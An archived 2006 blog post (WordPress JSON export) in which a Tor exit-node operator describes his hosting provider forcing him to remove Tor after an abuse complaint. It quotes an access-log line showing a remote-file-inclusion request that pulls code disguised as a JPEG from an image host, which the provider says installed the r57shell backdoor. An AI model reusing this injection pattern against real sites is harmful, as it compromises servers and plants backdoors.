{"id":110,"date":"2006-10-16T15:57:45","date_gmt":"2006-10-16T15:57:45","guid":{"rendered":"http:\/\/blog.bananasplit.info\/?p=110"},"modified":"2006-10-16T15:57:45","modified_gmt":"2006-10-16T15:57:45","slug":"last-rites","status":"publish","type":"post","link":"https:\/\/blog.stmellion.org\/?p=110","title":{"rendered":"Last Rites"},"content":{"rendered":"

Today has been a long time coming, but the inevitable happened in the end; Layered Technologies<\/a> shut me down.<\/p>\n

It started off with just the usual abuse complaint. This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net. The complainant had already fixed their vulnerability by the time they contacted Layered Technologies<\/a>, but I still got the usual immense email telling me how to fix an exploit I didn\u00e2\u20ac\u2122t have. I won\u00e2\u20ac\u2122t post it all below as it\u00e2\u20ac\u2122s ridiculous. This is the guts:<\/p>\n

\nTicket #AMU-37245-883<\/p>\n

From: abuse@layeredtech.com
\n To: steve@bananasplit.info<\/p>\n

Subject: Policy Enforcement of SID6321 LTSV-1594-SCROOK at 72.21.33.202 for Hacking<\/p>\n

Thank you,<\/p>\n

Logan
\nLayered Technologies
\nAbuse Department
\nPolicy Enforcement Technician<\/p>\n

ACCEPTABLE USE POLICY at http:\/\/layeredtech.com\/aup.shtml<\/p>\n

Date: Sun, 15 Oct 2006 18:32:53 -0500<\/p>\n

A HACKER from LayeredTech is trying to exploit a hole in our client’s site code that we closed. The HACKING SCRIPTS are provided from FREEIMAGEHOSTING as phony JPGs.<\/p>\n

72.21.33.202 – – [15\/Oct\/2006:03:09:07 -0700] “GET \/index.php?pagename=http:\/\/img3.freeimagehosting.net\/uploads\/ba5cd3062d.jpg?
\nHTTP\/1.1” 200 18434<\/p>\n

HACKER:
\nName: drooper.bananasplit.info
\nAddress: 72.21.33.202<\/p>\n

HACKING CODE:
\nName: img3.freeimagehosting.net
\nAddress: 70.86.147.247\n<\/p><\/blockquote>\n

Looks pretty minor to me and I\u00e2\u20ac\u2122ve had enough prior dealings with Logan at Layered Technologies to know that he\u00e2\u20ac\u2122s one of the good guys. Unfortunately by the time I responded, I didn’t get Logan, I got Terry. Oh dear, this is the guy who claims to know all about Tor<\/a> but still seems to think I can gaze into a crystal ball and preempt an attack on an insecure website. Things went downhill from here, Terry insisted I shutdown my Tor service:<\/p>\n

\nto: steve@bananasplit.info<\/p>\n

You must remove the TOR (anonymous proxy) software because it has been used to send a URL embedded with a command to cause a 3rd party server to download a php exploit which is actually r57shell.php (a backdoor shell).<\/p>\n

We do not allow TOR or Proxies on our network that are used for abuse.\n<\/p><\/blockquote>\n

This is the clincher that convinced me it was time to cancel my contract with Layered Technologies<\/a>. Terry knows damn well that there’s nothing I can do to stop a Tor<\/a> exit-node from being used in this manner. It seems Layered Technologies<\/a> allow people to run Tor<\/a> servers (sales pitch), but they do not allow Tor functionality. What a rip-off. I replied:<\/p>\n

\nTerry,<\/p>\n

I’ll comply and remove Tor, but please take this as notice that I won’t require your hosting beyond the end of this billing period. Having been specifically advised by LayeredTech that I could host a Tor service, this is very disappointing news. It seems your sales pitch in not in
\ntune with your operating practises.<\/p>\n

I’d also like to point out that I’ve purchased a number of upgrades to my server. As LayeredTech are changing their policy with regard to Tor, am I entitled to any refund of these costs?<\/p>\n

Regards
\nSteve\n<\/p><\/blockquote>\n

I guess the bit about wanting a refund is a little tongue-in-cheek. Layered Technologies<\/a> will never admit that they errored in allowing a Tor service without really understanding what it was. To claim that the service is acceptable but what it does is not is nothing more than a “We’ve got your money, now fuck off, you’re a nuisance”. Terry’s response was:<\/p>\n

\nWe have not changed our policies. You are responsible for all abuse occuring on, from, or through your assigned IP addresses. You are required to remove the cause of any abuse which occurs on, from, or through your assigned IP addresses. We allow proxies and TOR only to the extent that it is not used for abuse. Because TOR is completely anonymous using tunnels to hide communications and preventing traffic analysis to determine the source of an abuse through your server, you cannot identify, remove, or prevent the cause of the abuse. Therefore, the only way to protect our IP space and innocent 3rd party networks from further abuse is to require removal of the TOR. You should understand that your server has been used to attempt to cause the installation of backdoor hacking software onto 3rd party servers which would completely comprimise the 3rd party server. This places our company at legal liability and this is justification for the removal of the software.\n<\/p><\/blockquote>\n

I wasted my time and replied to this, pointing out to Terry that Layered Technologies<\/a> are not in any way legally accountable for a service that blindly routes traffic. He already knows this as I’ve bashed my head against a brick wall telling him all that before. I just got an automated response saying the abuse ticket was closed.<\/p>\n

So there it is, the end of my Layered Technologies<\/a> experience. Lots spent in setup and upgrade costs whilst all the time knowing that sooner or later they would pull the plug. At least recording my experiences will make others think twice when opening a service at Layered Technologies<\/a> that can potentially be abused. In general, such services are probably going to be more trouble to them than the business is worth.<\/p>\n","protected":false},"excerpt":{"rendered":"

Today has been a long time coming, but the inevitable happened in the end; Layered Technologies shut me down. It started off with just the usual abuse complaint. This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net. The complainant had already fixed their vulnerability by the… Continue reading Last Rites<\/span><\/a><\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-110","post","type-post","status-publish","format-standard","hentry","category-layered-technologies","entry"],"_links":{"self":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts\/110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/users\/24"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=110"}],"version-history":[{"count":0,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts\/110\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}